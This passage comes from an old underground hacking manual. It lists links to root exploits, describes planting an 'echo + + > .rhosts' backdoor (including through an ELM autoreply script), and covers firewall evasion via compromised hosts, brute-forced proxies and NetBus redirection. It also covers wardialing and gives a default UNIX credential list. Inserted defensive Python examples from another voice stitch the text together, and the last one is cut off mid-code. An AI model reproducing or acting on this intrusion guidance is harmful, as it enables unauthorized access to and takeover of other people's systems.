ability to write to any .rhosts file. From there, you can echo + + > .rhosts as described in
the UNIX section, and rlogin into any account without a password. Get info at
www.unitedcouncil.org/c/asppp.txt.
ELM Autoreply Vulnerability (local)
If a .autoreply file exists in a user's home directory (UNIX), it will be used to auto-reply to
any email that reaches the user's inbox. The file itself is nothing more than a shell script.
For example: user tgregor goes on vacation, and makes his .autoreply shell script send a
letter back to anyone who sends one to him, telling them he is on vacation. So if you, a
hacker, can get write access to someone's home directory (who uses ELM for an email
client), you can write your own .autoreply file. Make it do something like echo + + >
.rhosts. Then send him an email - the script will run, and you can now rlogin to that
person's account. Slick, eh?
Solaris GetHostByName Vulnerability (local)
Solaris version 2.5.X's gethostbyname system call is vulnerable to a pseudo-buffer
overflow. Get the exploit code at www.netcraft.com/security/lists/gethostbyname.txt
BSDI Screen Vulnerability (local)
The BSDi OS (UNIX) has a file called Screen that can be sploited to view passwd files.
The exploit is at www.sabotage.org/rootshell/hacking/screen.txt
SunOS Sushi Ping (local)
SunOS 4.1.X is vulnerable to this ping attack. If you can execute it, you'll have a
rootshell on the Sun box. Get an explanation and the code at
www.unitedcouncil.org/c/sushiPing.c
FreeBSD Rdist Vulnerability (local)
This exploit works on most versions of FreeBSD, and will get you a rootshell. Get the
code at www.society-of-shadows.com/security/rdist-ex.c
FreeBSD Sendmail Vulnerability (local)
Sendmail, an SMTP daemon (one with a history of vulnerabilities), is vulnerable to a
buffer overflow - from the inside (locally). FreeBSD 2.1.X is vulnerable - the code is at
www-jcr.lmh.ox.ac.uk/rootshell/hacking/FreeBSDmail.txt
Linux Memory Vulnerability (local)
This isn't so much a buffer overflow as it is an entire memory address range overflow.
And it will get you root: go to www.society-of-shadows.com/security/mod_ldt.c for the
code.
Linux NCSA Vulnerability (remote)
This is a biggie that has made many hackers happy and many sysadmins unhappy. The
NCSA httpd is vulnerable, and if properly exploited will give an attacker a remote shell.
The exploit is at: www2.fwi.com/~rook/exploits/linux_httpd.c
Redhat inetd Vulnerability (remote)
Redhat is a popular distribution of Linux - used by the author of this manual.
Unfortunately, imapd (a daemon running by default) is vulnerable to a buffer overflow
leading to root - from the outside (remote). The xploit code is at
mayor.dia.fi.upm.es/~alopez/bugs/bugtraq2/0263.html
Linux Mouse Vulnerability
Yes, it's true. Specific mouse support for Linux can be exploited to get root. Go to
www.asmodeus.com/archive/linux/GPM-EXPLOIT.TXT
Some exploits I went into more detail with and explained how to use them, some I didn't.
If you want step-by-step instructions on how to exploit each vulnerability, you're out of
luck. Be a hacker: research it, or better yet, experiment with the vulnerable daemon or file
yourself. Most exploit archives have at least a little description of how to use each
exploit. If it's a CGI vulnerability, play with the URL a bit. Put a ? at the end of it, and
see what happens. Also, learn the extensions of certain code. For example a .c file means
it's C code, and needs to be compiled with cc or gcc (try both). .pl files are Perl scripts,
and will be interpreted with Perl or Perl.exe. .asm files are assembly, and need an
assembler to be compiled. .sh files are shell scripts (usually) so just use the correct UNIX
shell to run it.
If the exploit needs to be compiled and run, do so with both cc and gcc. Some exploits
were written for a specific shell - the C and TC shells usually work best, since their native
commands more closely resemble the C programming language. Also, some exploits have
critical lines of code commented out to keep complete lamers from using them. So check
for them. What does commented out mean? Programmers often put comments in their
code, like "this line executes the main proc" or something similar, to explain their code to
other programmers, or even themselves. These comment lines start with things like:
/*
rem
and the like. If you see a commented line that looks like code, and not a comment,
uncomment it and try to recompile. If you're having trouble compiling an exploit, get
yourself an intro to that programming language, and learn enough to spot possible
problems. Seem like a lot of work just to get one little exploit to work? Then give up - or
be a hacker and learn.
Firewall Penetration
Ahh firewalls. Technology with only one purpose - keeping hackers out. Many newbies
are intimidated by a system they know has a firewall, and don't even bother. Technically,
though, every network has a firewall. A firewall, by definition, is nothing more than a
system used to secure the network. Nothing specific, just that and nothing more. So if all
that is blocking a network from outside access is a UNIX login prompt, that is its firewall.
Generally speaking, though, when we refer to a firewall, there are a few distinct levels.
Here I'll explain those levels, and how to circumvent them.
Routers as Firewalls
When you scan a class C subnet, and find three computers, do you think that those are the
only three computers on that network? Not usually. Every network that is connected to
the Internet is connected via a complex piece of hardware known as a router. Routers
route packets of data based on the source IP address of the sending machine, and the
destination IP address of the receiving machine. Similarly, routers can block certain IP
addresses. Every packet of data sent to any computer in your target network must pass
through the router connecting the two, and if the router is programmed to not let
connections be made to one particular computer, it will discard all packets sent to it, thus
blocking you from connecting to it. Also, routers can be set up to allow connections to
certain machines, but block certain port numbers. So if you scan a machine that has an
open port 23 but is being blocked by the router, you won't be able to establish a
connection. It is rare, though, that routers are configured to disallow connections from all
IP addresses. Generally, a router will allow a select number of IP addresses through, like
affiliate companies, or different networks of the same company. So how do you penetrate
a firewall router that won't let you through? Masquerade as a trusted computer. Bounce
your connection off a computer that the router might let by. For example, let's say you
hacked an account on the webserver (port 23 was not blocked). That's not enough for
you - you want root on the hub computer of the network. But port 23 is blocked on it.
You might connect to the webserver, then, from it, telnet to your target machine. Chances
are the router will let you connect - why wouldn't it let a computer from its own network
connect?
Any computer that is blocked by an IP filtering router is said to be behind the firewall. Any
that is not blocked is said to be in front of the firewall. There are a number of computers
that cannot be behind a firewall. The web server, for example. How could people get the
web page of your target if it was blocked? Also, mail servers have to be in front of the
firewall, so that emails aren't blocked, and get sent to the appropriate recipient. Name
servers (computers with port 59, DNS, open) also cannot be blocked, as they are the
computers that translate names (such as www.microsoft.com) into a network IP address.
The trick to connecting to a computer blocked by a packet filtering router is to masquerade
as a computer in a trusted network, or from a computer in front of the firewall.
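The weak point this section describes is a filtering router that trusts traffic by source address alone, so that one compromised host in front of the filter inherits the trust of the whole segment. As an added example (not code from the manual or from any product it names), here is a small Python simulation of that stateless first-match filter logic, written from the defender's side: the permissive ruleset that trusts the organization's own public segment wholesale, beside a corrected one that explicitly denies the web server's path to the internal host and grants telnet only to a named admin network. All addresses, host roles and rules are constructed for illustration and use documentation address ranges.

```python
"""Stateless packet-filter simulation (added example; not code from the manual).

Models the 'routers as firewalls' behaviour above: first matching rule wins,
anything unmatched is denied. All addresses and rules are constructed.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass(frozen=True)
class Rule:
    action: str            # "allow" or "deny"
    src: str               # source network, CIDR
    dst: str               # destination network, CIDR
    dport: Optional[int]   # destination TCP port, None = any port

    def matches(self, src_ip: str, dst_ip: str, dport: int) -> bool:
        return (ip_address(src_ip) in ip_network(self.src)
                and ip_address(dst_ip) in ip_network(self.dst)
                and (self.dport is None or self.dport == dport))


def decide(rules: List[Rule], src_ip: str, dst_ip: str, dport: int) -> str:
    """Return 'allow' or 'deny' for one packet; the implicit final rule is deny."""
    for rule in rules:
        if rule.matches(src_ip, dst_ip, dport):
            return rule.action
    return "deny"


# Constructed topology (documentation address ranges, not real hosts):
#   203.0.113.0/24  the organization's public segment, web server lives here
#   10.0.0.0/24     the internal segment behind the router, 'hub' host lives here
#   192.0.2.0/24    the admin network that legitimately needs telnet to the hub
WEB, HUB = "203.0.113.10", "10.0.0.20"

# Weak ruleset: 'anything from our own public segment is trusted inside' -- the
# assumption the text above shows being abused once one such host is compromised.
WEAK_RULES = [
    Rule("allow", "0.0.0.0/0", WEB + "/32", 80),
    Rule("allow", "0.0.0.0/0", WEB + "/32", 23),          # telnet to the web server left open
    Rule("allow", "203.0.113.0/24", "10.0.0.0/24", None),  # trust by source address alone
]

# Corrected ruleset: no remote telnet to the web server, the web server is
# explicitly denied the hub's telnet port, and only the admin subnet gets it.
HARDENED_RULES = [
    Rule("allow", "0.0.0.0/0", WEB + "/32", 80),
    Rule("deny", WEB + "/32", HUB + "/32", 23),
    Rule("allow", "192.0.2.0/24", HUB + "/32", 23),
]


def two_hop_path_allowed(rules: List[Rule], outside_ip: str = "198.51.100.7") -> bool:
    """Does 'outside -> web server (23) -> hub (23)' pass both filter checks?"""
    hop1 = decide(rules, outside_ip, WEB, 23)   # outside host to the web server
    hop2 = decide(rules, WEB, HUB, 23)          # web server onward to the hub
    return hop1 == "allow" and hop2 == "allow"


if __name__ == "__main__":
    for name, rules in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        direct = decide(rules, "198.51.100.7", HUB, 23)
        print(f"{name}: direct outside->hub:23 = {direct}, "
              f"two-hop path allowed = {two_hop_path_allowed(rules)}")
```

Under the weak ruleset the direct connection is denied but the two-hop path is allowed, which is exactly the gap the text describes; the hardened ruleset closes it at the first hop and again at the second, and leaves the admin network's access intact. The point to take from it as a defender is that a filter rule keyed only on "our own address range" is a trust decision about every host in that range, including the ones that are exposed to the Internet.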
There are other ways to masquerade as a computer from inside your target network to
pass through a firewall. What if your target machine is an NT Server? There is no telnet
daemon. Well, if there are NT servers on the network, there will be NT Workstations and
Windows 9x boxes too. And those machines will probably have internet access. How do
they connect to the internet? Via a proxy server - all HTTP requests are directed to the
designated proxy server, which requests the URL for them, gets it from whatever webserver
the web page is on, and sends it back to the workstation inside the internal network that
originally requested it. Remember that when computers surf the Internet via a proxy
server, their IP address (to the Internet) is that of the proxy server (read the 'keeping from
getting caught' section for more details on how this works, or check the definition of
'proxy server' at the beginning of this text). So how do you connect to a webpage on an
internal computer that is blocked by the router? Connect via the network's proxy
server. If a proxy server exists (which one will, 99% of the time), it cannot be blocked by
a firewall - how would the requested web pages be sent back to it if it were? Okay, so we
know that one of the computers that turned up on a subnet scan is probably a proxy
server. Your next step is to use it to make connections for you. Go to your Netscape or
Internet Explorer settings, and select 'proxies.' (Note: proxy settings in your Internet
Preferences or Control Panel only work if you are physically connected to a proxy
server, meaning on the same LAN as it.) For HTTP ports, try 80, 8080, 88, and 8888.
For FTP, try 21, 2121, etc. It's less common, though, for proxy servers to be set up to
handle FTP proxying. So for each computer you found on the subnet, enter it in as a proxy
server in your browser settings, hit 'Okay,' and then just request any web page.
www.hackers.com, or whatever. On the bottom of your screen, you will see your
browser attempting to connect to the proxy server. If you get an error message, the
computer is not a proxy server, or you specified the wrong port number (try some others).
If the web page you requested shows up on your browser - congratulations, you
connected to the proxy. Now request pages (or an FTP session) with a computer behind
the firewall - chances are it will let you in since your IP address is now the proxy server's
when making connections of the protocol you specified to use proxies for (and again,
firewalls generally allow connections from computers of their own network). Now, proxy
servers will allow computers to use them as a proxy based on a set of criteria. These are:
- Always - any computer connecting will be allowed to use this proxy (known as a
  public proxy)
- Depending on who connects to it, ie: the IP address of the connecting computer,
  or
- If the connecting computer can validate itself with a username and password
If you are prompted with a username and password request, you are not out of luck. Get
yourself WebCrack, enter the proxy server as the target machine, and launch an attack.
Proxy server authentication is exactly the same as password protection of private web
pages, and WebCrack will brute force until it's let in. Once you find a valid username and
password combo, you will be able to use the proxy. Now connect to the computer
blocked by the router.
You've just cracked a firewall.
Private IP Networks as Firewalls
Certain ranges of IP addresses are known as 'private.' For example, all the 10.x.x.x (class
A) and 172.16.x.x (class B) networks are private, and if you try to connect (telnet, http,
whatever) to one of these addresses, the address will not resolve (ie: you won't be able to
connect). Oftentimes, companies will use a range of private IP addresses in order to
keep hackers out. This is another form of a firewall. However, if the company wants their
network connected to the internet in any fashion (for their workstations to be able to surf,
or for email, or whatever), at least one computer has to have a public IP address, meaning
an IP address that the Internet (and therefore you) can connect to. This computer is a
proxy server of sorts, and generally has two Network Interface Cards (adapters used to
connect network cable to), one with one of the private addresses, one with a public
address. This 'public' computer, being the specialized proxy server, will (unlike your
computer, and any other on the Internet) understand the private address. So to connect to
the 10.x.x.x (or whatever private address your target uses internally), you'll need to
connect to the proxy server. If it's a UNIX machine, you'll have to get an account with
telnet access, and telnet from it to your destination. If it's a Windows machine, you'll have
to use the proxying method explained above. The reason that this machine understands the
private addresses is because it has an ARP (Address Resolution Protocol) table for those
computers. For more info on this, look into ARP and IP routing.
Since the proxy server is the only computer on the entire Internet that is able to connect to
the private network protected by this type of network, you will have to connect through it.
One other option is hacking into it, and installing a port redirector program. For example:
if you can install NetBus onto the computer, you can set it to redirect all connections
made to a port you specify to another address. So let's say when you try to connect to
10.2.56.14 (reserved) with telnet, you get a 'failed to resolve address' message, meaning
that address is not on the Internet, and neither your computer (nor any other on the Internet)
understands that address. But you know that 204.56.87.5 (an address that is on the
Internet, and that you can connect to) is the proxy server for the 10.2.56 network. You
break in, install NetBus, and set the port redirector to 10.2.56.14. Next - telnet to
204.56.87.5 (on the port you specified to be redirected) and since 204.56.87.5 knows
where 10.2.56.14 is, your connection will be bounced over to that machine.
Congrats - you've just penetrated another firewall.
In Summary
With this text I've scratched the surface of the hacking of today. If nothing else, you
should have learned just how much you're going to have to learn to become a proficient
hacker. You'll need to learn more about various protocols, about different operating
systems. Learning programming languages such as C or Perl would definitely help you.
There are a lot of programs out there, but most do the same as their legitimate counterparts
would do, and don't allow much room for fine tuning. Imagine the power in the ability to
write a target-specific program to aid you in hacking it! Anyways, I also strongly suggest
installing Linux on your machine as well. UNIX is more powerful (and therefore more
complex) than DOS and Windows, and the only way you'll learn anything about it is to
have it (not to mention raw sockets!). Even a book wouldn't be of much use if you had
nothing to apply what you've learned on. When faced with a challenge that you don't quite
understand, fumble your way through. Try not to ask for help all the time. You'll learn a
lot more that way - and not just about the obstacle in question. In closing, let me say that
you should never decide that you know enough. An unquenchable thirst for knowledge is
what drives the real hacker. The process, not the end result. I guess I see no better way
to end this text than with my favorite quote (from a good friend of mine):
"What do you want to hack today?"
[ Kurruppt2k ]
Shoutouts and Credits
Most of the info and methodologies here are from first hand experience. Some of the
exploits listed I got from Maximum Security (but I tried them, to make sure they work),
and SecurityFocus. Inspiration? Go download a few good techno MP3s (all available at
mp3.com) - Matrix by Wintermute, Darth Techno by Raver FX, and Linux vs. Win NT by
Noize Concept will all set the stage for some serious haxoring.
And a manual like this wouldn't be complete without a few shoutouts to my cohorts.
Shoutouts go to: Raz0rphane aka RiotKl0ne, _Syn, the LoungeRaptor, Grim Ph0enix,
Dr34d 451, Enz00, WCU, HeadCase, ViRuSS, and Blu3skr33n, and all of Shadow of the
iNode. Phear SiN.
If you (the reader) can think of anything you'd like to see added in future releases, or just
have any criticisms, email me at kurruppt2k@mailcity.com. Thanx.
Appendices
Here is a compilation of miscellaneous info that either had no logical place in the flow of
the manual, or is just kinda a chart or list of info that is better appended to the end. Have
phun.
Appendix A - Dialup Hacking
This is something that has almost gone away completely. Back in the old skool days of
hacking, people connected their networks by dialing into computers of their remote
offices. Leased digital lines (such as T1s, DSL, or Frame Relay) were much too
expensive for most, so modems and the PSTN (Public Switched Telephone Network)
were used. Nowadays, though, companies connect their networks with either dedicated
digital lines, or over the internet (with technologies such as VPNs, explained in the crypto
section of Intro to h/p/v/c). And that's how hackers connected to their victims - by
dialing directly into them. This limited hackers' techniques to primarily brute force, social
engineering, and trashing. Only being able to dial in is like having port 23 the only open
port on every machine you ever try to hack. Not much phun.
Today, though, hackers do their work over the Net. On occasion, though, you may find
yourself dialing right into the system you're trying to crack. Why? Maybe your target
isn't on the Net, but has a modem. Maybe while tiptoe-ing around you found that one
machine on their NT network was a RAS server, and you want to dial in. For whatever
reason, you'll probably dial into at least one machine in your h/p career.
Dialing a modem with your own is just like telnetting to a machine. You type characters
which are sent to the host, and it sends characters back to your screen. This means a few
things. Your programs that use any TCP/IP stuph won't work - because you're not
communicating over a TCP/IP network. All you can do is send text over the wire. One of
the only reasons you ever might want to hack via dialup is because some companies might
have a heavily guarded firewall system in place for the Internet, but less secure modems
(like if an employee hooks up a modem to their workstation without the sysadmin
knowing about it).
To dial out from your computer, you'll either use a Windows or DOS program such as
Terminal, Hyperterminal, or Dial-Up Networking, or a Linux program such as netconf or
pppd. Hyperterminal comes with Win9X and NT, but I prefer the old Terminal program
that came with Windows 3.X. To talk to your modem, you'll use the AT commands.
Here are a few of those.
AT      To see if your modem is responding. If so, you'll get an OK message back.
ATE0    To turn the local echo off. Some hosts will echo (send) characters you type back
        to your screen. If they do, turn the echo off.
ATE1    To turn the local echo on. If the host you're calling doesn't echo, you'll want to
        see what you're typing.
ATS0    To turn your modem speaker off.
ATS1    To turn your modem speaker on.
ATPPP   To turn PPP mode on.
ATDT    To dial a number using touch-tone (DTMF). To dial 555-6789 type: atdt 5556789
ATPT    To dial a number using pulse dialing.
There are a lot of modem commands. Hyperterminal won't let you use them, since it does
all the dialing of numbers for you. Older DOS dialers/terminal emulators let you, though,
as does Terminal.
When you dial into a machine, you'll most likely see either some old mainframe OS, or a
UNIX machine. NT does have a program called RAS, though, which stands for Remote
Access Service. You use Dial-Up Networking to connect to RAS servers, and once
authenticated, the computer (and sometimes network) you dialed into will show up in
your Network Neighborhood. Windows 9X DUN must be updated before it can dial
into RAS servers, but NT Workstation's DUN will work out of the box.
PSTN Protocols. When the PSTN was the primary means of internetworking, a few
protocols were developed to transfer data between remote hosts. Kermit, xmodem, and
ymodem are a few of these. Mainframes usually support these, so get a dialup terminal
emulator that supports these protocols to get or put data from/onto these machines.
Terminal has a built-in file transfer function. Kermit for DOS supports most PSTN
protocols also.
How do you find dialup phone numbers? First find all phone numbers associated with that
organization. Look in the phone book. Do a whois and you'll get a few phone numbers.
Then get yourself a wardialer. This is a program that scans PSTN exchanges. In layman's
terms, it will dial every phone number in a range you specify looking for modems. These
programs were very popular years ago, and most are for DOS. A few GUI wardialers
exist though. Two very good ones are PhoneTag and PhoneSweep. So say you look up
the phone number of victim.com in your phone directory and get 555-1234. You whois
them, and for an administrative contact you get 555-9876. You'd want your wardialer to
scan 55512XX and 55598XX, meaning:
555-1200 to 555-1299 and
555-9800 to 555-9899

Youll probably find a few numbers that are carriers (modems). Dial into each, and see
what you find. If you get nothing when you connect, or garbage, try changing your start
bits, stop bits, and parity (in the settings of your dialer program) to get readable results.
For wardialers, PhoneTag is a good one. PhoneSweep is good too, and also has a built-in
brute force program, which is pretty handy, especially for dialing into UNIX servers. This
program might be your only way in to many dialup servers.
Then there's DUN. Microsoft Dial-Up Networking. When you dial your ISP, DUN takes
care of all the sending and receiving of characters over the phone line for you. To see
what's happening behind the scenes while you connect to your ISP, dial it with Terminal or
Hyperterminal. You'll actually get a login prompt that looks like one of these:
Login:
Username:
Userid:
Enter garbage, some username and password you know won't work. You'll get an access
denied message, or a regular UNIX bad login message. Then enter the
username/password you use to connect to your ISP. You'll usually get a string of garbage
characters, which is PPP or SLIP data (meaning you're connected to the Net). When you
use DUN, it types your username and password for you. Some systems require additional
info. One ISP I had prompted with just a > sign, at which point you type logon. You
then got a logon prompt, followed by the PPP data if you logged on successfully. DUN
will take care of all of this miscellaneous data transfer for you. Sometimes, though, the
host you dial into has a very obscure login process, involving multiple logons and
commands to get an Internet connection. DUN can't know all of this, so you use Dial-Up
Networking scripts. These are .scp files. DUN scripts tell DUN what characters to send,
and when. For example, a while back CompuServe didn't have their own DUN client
program, and logging into their system was too obscure for DUN to handle by itself, and
too confusing for most people to use. So they gave out an .scp file to use with MS DUN,
that typed in the appropriate characters at the right time. What's the point of all this?
DUN scripting is very easy to learn. Do a search on your own box for *.scp, and you'll
find a few that come with Windows. The syntax is pretty easy. Functions like Expect,
and Send. Something like "expect login: - send root" means when I get the text
"login:" I'll send the text "root". If you spend a few minutes looking at the .scp files that
come with Windows, you'll figure out how to use it. And when you do, you'll be better
armed to hack a dialup machine. Write a script that BFs your target. Or write one that
spits tons of data (lines and lines of characters) to a certain prompt to overload it and see
what happens - maybe you'll get a shell.

Appendix B - Commonly used and default usernames/passwords, UNIX
username: common passwords
-----------------------------------------
root: root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo / tour / guest
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
qadmin: adm / admin
123: lotus / lotus123
anonuucp: anon / uucp
asg: device / devadmin
backup: save / tar
csr: support / castup
dbcat: database / catalog
default: user / guest
diag: diag / sysdiag(s)
field: fld / test / support
end: visitor / demo / tour
informix: database
ingres: database
lib: library / syslib
lp: print / lpadmin
lpr: (no password)
main: sysmaint / service
mail: mail / email / phones
manager: mgr / man
ncrm: ncr
net: netowrk
netinst: inst / install / net
netman: net / man / mgr
netmgr: mgr / man / net
network: net
nobody: anon
oasys: oa
odt: opendesktop
oper: operator / sysop
sysop: sysadm / sysop
ftp: ftp / anon / anonymous
telnet: telnet
visitor: anon / guest
www: webmaster / webadmin
Appendix C - UNIX commands
Here are some basic commands that work on most UNIX flavors.
cd [dir]             change directory to [dir]. cd with no arguments will place you in your
                     home directory.
pwd                  tells you what directory you're currently in.
ls                   lists the files in your pwd
ls -a                lists all files in your pwd, even hidden files (files that begin with a period)
ls -l                lists the files in your pwd, and gives the permissions for them
cat [file]           displays the file you pass as an argument on the screen, equivalent to
                     'type' in DOS
vi                   powerful text editor, for advanced users
emacs, pico          text editors, similar to MS-DOS Edit
man [command]        gives you the manual (help pages) on a particular command - USE
                     THIS!!!
cp [src] [dst]       copy a file from src to dst
rm [file]            delete a file
mv [file] [newfile]  move or rename a file
mkdir                create a directory
chmod                change permissions of a file you own (use 'man' to learn more about this
                     command)
grep                 search a file for a particular string
talk                 chat with a user
mail                 commandline email
pine, elm            front-ends to mail
rlogin               learn about rhosts files - a great hacking technique
rsh                  ditto
Also, if you are familiar with DOS redirects, appends, and pipes, they work similarly in
UNIX. Remember, when in doubt, RTFM!
Appendix D - NT Hex Codes
When you nbtstat an NT b0x, you'll be presented with a list of entries, and a hex code in
angle brackets telling you what that entry is. Why do you need to know any besides <00>
and <20>? To get an idea of what role the computer plays in the domain. Here's what
they are (Type: U = unique name, G = group name).
Name                Number  Type  Usage
========================================================================
<computername>      00      U     Workstation Service
<computername>      01      U     Messenger Service
<_MSBROWSE_>        01      G     Master Browser
<computername>      03      U     Messenger Service
<computername>      06      U     RAS Server Service
<computername>      1F      U     NetDDE Service
<computername>      20      U     File Server Service
<computername>      21      U     RAS Client Service
<computername>      22      U     Exchange Interchange
<computername>      23      U     Exchange Store
<computername>      24      U     Exchange Directory
<computername>      30      U     Modem Sharing Server Service
<computername>      31      U     Modem Sharing Client Service
<computername>      43      U     SMS Client Remote Control
<computername>      44      U     SMS Admin Remote Control Tool
<computername>      45      U     SMS Client Remote Chat
<computername>      46      U     SMS Client Remote Transfer
<computername>      4C      U     DEC Pathworks TCPIP Service
<computername>      52      U     DEC Pathworks TCPIP Service
<computername>      87      U     Exchange MTA
<computername>      6A      U     Exchange IMC
<computername>      BE      U     Network Monitor Agent
<computername>      BF      U     Network Monitor Apps
<username>          03      U     Messenger Service
<domain>            00      G     Domain Name
<domain>            1B      U     Domain Master Browser
<domain>            1C      G     Domain Controllers
<domain>            1D      U     Master Browser
<domain>            1E      G     Browser Service Elections
<INet~Services>     1C      G     Internet Information Server
<IS~Computer_name>  00      U     Internet Information Server
<computername>      [2B]    U     Lotus Notes Server
IRISMULTICAST       [2F]    G     Lotus Notes
IRISNAMESERVER      [33]    G     Lotus Notes
Forte_$ND800ZA      [20]    U     DCA Irmalan Gateway Service
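Reading this table by hand for every host gets old fast, and on your own network the same information is what you need to inventory which machines are advertising browser, domain controller or IIS roles they should not be. As an added example (not code from the manual), here is a Python parser for name-table output in the layout nbtstat -A prints, which maps each suffix and name type onto the roles in the table above. The sample output is constructed to mimic the real layout and is not a capture from any system; the FILESRV01 and CORPDOM names are invented.

```python
"""Parse nbtstat-style name-table output and label each entry with its role.

Added example; not code from the manual. The sample output below is
constructed to mimic the layout of 'nbtstat -A', and the role table is the
one listed in Appendix D above (U = unique name, G = group name).
"""
import re
from typing import Dict, List, Tuple

# (suffix, type) -> role, for the generic <computername>/<domain> entries.
GENERIC_ROLES: Dict[Tuple[str, str], str] = {
    ("00", "U"): "Workstation Service",
    ("00", "G"): "Domain Name",
    ("01", "U"): "Messenger Service",
    ("03", "U"): "Messenger Service",
    ("06", "U"): "RAS Server Service",
    ("1B", "U"): "Domain Master Browser",
    ("1C", "G"): "Domain Controllers",
    ("1D", "U"): "Master Browser",
    ("1E", "G"): "Browser Service Elections",
    ("1F", "U"): "NetDDE Service",
    ("20", "U"): "File Server Service",
    ("21", "U"): "RAS Client Service",
    ("2B", "U"): "Lotus Notes Server",
    ("BE", "U"): "Network Monitor Agent",
    ("BF", "U"): "Network Monitor Apps",
}

# Entries identified by a fixed name rather than by suffix alone; the name is
# matched after upper-casing and stripping the dots/underscores nbtstat prints.
NAMED_ROLES: Dict[Tuple[str, str, str], str] = {
    ("MSBROWSE", "01", "G"): "Master Browser",
    ("INET~SERVICES", "1C", "G"): "Internet Information Server",
    ("IRISMULTICAST", "2F", "G"): "Lotus Notes",
    ("IRISNAMESERVER", "33", "G"): "Lotus Notes",
}

# One table row: name, <XX> suffix, UNIQUE|GROUP, status word.
ROW_RE = re.compile(r"^[ \t]*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)


def parse_name_table(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (name, suffix, U/G, role) for every registered row in the output."""
    rows = []
    for name, suffix, kind, status in ROW_RE.findall(text):
        if status != "Registered":
            continue
        suffix, kind = suffix.upper(), kind[0]   # "UNIQUE" -> "U", "GROUP" -> "G"
        key_name = name.upper().strip("._")
        role = (NAMED_ROLES.get((key_name, suffix, kind))
                or GENERIC_ROLES.get((suffix, kind), "unknown suffix"))
        rows.append((name, suffix, kind, role))
    return rows


def roles(text: str) -> List[str]:
    """Distinct roles present, in first-seen order: what the host is doing in the domain."""
    seen: List[str] = []
    for _, _, _, role in parse_name_table(text):
        if role not in seen:
            seen.append(role)
    return seen


def is_domain_controller(text: str) -> bool:
    """A host registering <domain><1C> as a GROUP name is advertising the DC role."""
    return any(role == "Domain Controllers" for _, _, _, role in parse_name_table(text))


# Constructed sample, shaped like 'nbtstat -A' output (not a real capture).
SAMPLE = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
FILESRV01      <00>  UNIQUE      Registered
FILESRV01      <20>  UNIQUE      Registered
FILESRV01      <06>  UNIQUE      Registered
CORPDOM        <00>  GROUP       Registered
CORPDOM        <1C>  GROUP       Registered
CORPDOM        <1B>  UNIQUE      Registered
INet~Services  <1C>  GROUP       Registered

MAC Address = 00-00-5E-00-53-01
"""

if __name__ == "__main__":
    for name, suffix, kind, role in parse_name_table(SAMPLE):
        print(f"{name:<16} <{suffix}> {kind}  {role}")
    print("domain controller:", is_domain_controller(SAMPLE))
```

Run against the sample, the parser reports that the host is a file server that also runs RAS and IIS and is a domain controller for CORPDOM; on a real inventory sweep the entries to look at are the ones that should not be there, such as a RAS server suffix on a machine nobody registered as a dial-in box.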

Appendix E - Commonly known TCP ports
If you're unsure about any of these, look at the protocol section of 'TCP/IP and the
Client/Server Model' above. Otherwise, research them on the Net.
Port  Description   How to Hack it (Explanation)
1     TCP Mux       You figure this one out
7     Echo          All characters are echoed back to you, used for network troubleshooting
9     Discard/null  The name says it all... how quick can you figure this port out?
11    Systat        Use this port to get info on users of that system
13    Daytime       Time and date, used to synchronize computers in a network
15    Netstat       Info on network settings for this computer - go here!
19    Chargen       Character Generator - used to spot network problems
21    FTP           File Transfer Protocol
22    SSH           Secure Shell - encrypted telnet
23    Telnet        Telnet
25    SMTP          Simple Mail Transfer Protocol
39    Rlp           Resource location
43    Whois         This machine has a whois daemon - use it
53    DNS           Domain Name Service
69    TFTP          Trivial FTP - oftentimes vulnerable (get /etc/passwd)
70    Gopher        Text-only web surfing and indexing
79    Finger        Info on users (and who's logged on). Hack this!
80    HTTP (www)    A web server
110   POP3          Post Office Protocol - used for email
111   SunRPC        RPC - used in conjunction with NIS, and possibly vulnerable
118   SQLSrv        SQL (Sequel) Server - this machine probably houses a huge database
119   NNTP          Network News Transfer Protocol - Usenet server
139   Nbsession     NetBIOS Session Service - Windows Networking
443   SSL           Secure HTTP - (Secure Session Link). Browse with 'https://'
512   Biff          Mail notification
513   Rlogin/who    Remote login / remote who
520   Route         Routing information protocol
524   NCP           Netware Core Protocol (over IP) - sure sign of a Novell Netware box
Appendix F - NT and UNIX Groups
Groups (in NT and UNIX) are an integral part of how permissions work. Most system
admins don't assign permissions to individual user accounts. Instead they put certain users
into certain groups, and assign permissions to those groups. Here is some info on groups
for both OSs.
NT
Group               Privileges
Domain Admins       High (Administrator equivalent)
Account Operators   High
Domain Guests       Low
Domain Users        Low (everyone is part of this group - gives everyone or the world access)
UNIX
Group    GID  Members
Root     0    root(UID 0)
Bin      1    root, bin(UID 1), daemon(UID 2)
Daemon   2    root, bin, daemon
Sys      3    root, bin, adm(UID 3)
Adm      4    root, adm, daemon
Tty      5
Disk     6    root
Lp       7    daemon, lp(UID 4)
Mem      8
Kmem     9
Wheel    10   root
Mail     12   mail(UID 8)
News     13   news(UID 9)
Uucp     14   uucp(UID 10)
Man      15
Games    20
Gopher   30
Dip      40
ftp      50
nobody   99
users    100
floppy   19
Daemons, such as httpd and ftpd, also have UIDs, which are set by the sysadmin. Having
daemons with low UIDs is an insecurity - if a remote attacker can exploit httpd with a
low UID, he can access resources with that UID equivalent. So if you buffer overflow
ftpd (running UID 0) from outside and get a shell, that shell will be a rootshell - since its
UID is 0 (root).
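The closing point of this appendix, that a daemon's privilege is whatever its UID and group memberships grant, is something a sysadmin can check mechanically rather than by eye. As an added example (not code from the manual), here is a Python audit that parses /etc/passwd and /etc/group in their standard colon-separated layout, works out who effectively belongs to each group (listed members plus anyone whose primary GID is that group), and flags service accounts that hold root-level privilege. The two sample files are constructed in the shape of the Red Hat defaults tabulated above, with one deliberate misconfiguration added for the audit to catch: an httpd account given UID 0. The account names, the "/sbin/nologin" test for service accounts and the set of privileged groups are assumptions of this example.

```python
"""Audit /etc/passwd and /etc/group for daemon accounts with dangerous privilege.

Added example; not code from the manual. The two files below are constructed
samples laid out like the Red Hat defaults in Appendix F, with one deliberate
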